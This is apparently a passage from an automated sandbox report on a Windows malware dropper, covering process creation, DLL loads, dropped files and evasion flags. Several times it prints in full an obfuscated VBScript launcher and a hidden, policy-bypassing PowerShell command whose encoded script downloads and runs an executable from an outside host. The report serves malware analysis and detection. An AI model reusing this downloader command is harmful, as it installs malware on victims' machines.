      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\tesubbaSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeUnpacked PE file: 12.2.oBuf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\tesubbaUnpacked PE file: 15.2.tesubba.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: createobject("sh"& e &"ll.application")execute("pow = ""pow""& e &""rsh""& e &""ll""")sh.ShellExecute "cmD."& e &"x"& e, "/c "& pow &" -nop -w hidd"& e &"n -"& e &"p bypass -"& e &"nc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=", "", "op"& e &"n", 0'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvi
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBC42FE pushad ; ret 4_2_00007FFAACBC42FD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBC00BD pushad ; iretd 4_2_00007FFAACBC00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAACBC42F0 pushad ; ret 4_2_00007FFAACBC42FD
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_0040237B push 000023C2h; retn 0023h12_2_0040238B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_004025DC push ebp; ret 12_2_004025FC
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401284 pushad ; iretd 12_2_00401286
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_006A2643 push ebp; ret 12_2_006A2663
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_006A12EB pushad ; iretd 12_2_006A12ED
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_006A23E2 push 000023C2h; retn 0023h12_2_006A23F2
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008DE70C push eax; retf 12_2_008DE70D
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E2224 pushad ; iretd 12_2_008E2226
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E3D49 push es; retf 12_2_008E3D60
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E8A5C push esp; ret 12_2_008E8A5D
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E5479 push ebx; ret 12_2_008E547C
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_0040237B push 000023C2h; retn 0023h15_2_0040238B
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_004025DC push ebp; ret 15_2_004025FC
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401284 pushad ; iretd 15_2_00401286
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005A2643 push ebp; ret 15_2_005A2663
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005A12EB pushad ; iretd 15_2_005A12ED
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005A23E2 push 000023C2h; retn 0023h15_2_005A23F2
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005CD84E push eax; retf 15_2_005CD85D
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005D7A1C push esp; ret 15_2_005D7A1D
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005D2D09 push es; retf 15_2_005D2D20
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005D4439 push ebx; ret 15_2_005D443C
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_005D11E4 pushad ; iretd 15_2_005D11E6
      Source: oBuf.exe.4.drStatic PE information: section name: .text entropy: 7.486630625699931
      Source: tesubba.14.drStatic PE information: section name: .text entropy: 7.486630625699931
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tesubbaJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tesubbaJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\tesubba:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
